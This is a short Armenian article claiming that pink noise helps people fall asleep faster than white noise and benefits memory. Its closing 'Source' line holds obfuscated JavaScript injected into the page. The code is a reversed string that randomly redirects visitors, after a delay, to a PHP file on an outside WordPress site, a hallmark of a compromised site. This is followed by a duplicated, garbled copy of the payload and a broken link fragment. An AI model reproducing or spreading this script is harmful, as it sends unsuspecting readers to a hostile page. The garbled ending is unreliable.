Պարզ միջոց՝ մի քանի րոպեում քուն մտնելու համար

Գաղտնիք չէ, որ գիշերային քունն առնվազն ութ ժամ պետք է տևի: Բայց շատ հաճախ անգամ կատարյալ պայմանների առկայության դեպքում դժվար է ոչ միայն 8 ժամ քնել, այլ նաև հեշտ քուն մտնել:

Պարզվում է՝ գիտնականները բացահայտել են, որ վարդագույն աղմուկը կարող է իրական բուժում հանդիսանալ անքնության համար:

Անցկացված ուսումնասիրությունները փաստում են, որ վարդագույն աղմուկն ավելի հանգստացնող ազդեցություն ունի, քան սպիտակ աղմուկը: Այն օգնում է խորը քուն մտնել, իսկ շարունակաբար կիրառելու պարագայում դրական ազդեցություն է ունենում նաև հիշողության վրա:

Աղբյուր՝ $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-fall-asleep-within-minutes-374267?fbclid=IwAR0XbKiyVRA6v3bXRZqYnC55SHI9_XebnRm2pqNJPlcj-GECerFUb_q9NUg” target=”_blank” rel=”noopener”>her.ie